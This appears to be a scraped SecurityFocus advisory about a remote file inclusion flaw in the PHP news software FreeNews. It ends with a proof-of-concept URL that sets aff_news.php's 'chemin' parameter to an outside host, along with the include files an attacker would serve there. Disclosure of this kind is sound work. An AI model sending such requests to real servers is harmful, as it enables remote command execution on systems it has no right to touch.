10 lines
No EOL
704 B
Text
10 lines
No EOL
704 B
Text
source: https://www.securityfocus.com/bid/6258/info
|
|
|
|
FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems.
|
|
|
|
Programming errors in FreeNews could lead to the inclusion of arbitrary files on remote servers in the web application. It is possible for a remote user to place commands in these include files that could result in execution on the local host. This would make remote arbitrary command execution as the web user possible.
|
|
|
|
http://example.com/aff_news.php?chemin=http://example.org/include with
|
|
http://example.org/config.php
|
|
http://example.org/options.inc.php
|
|
http://example.org/freenews_functions.inc.php |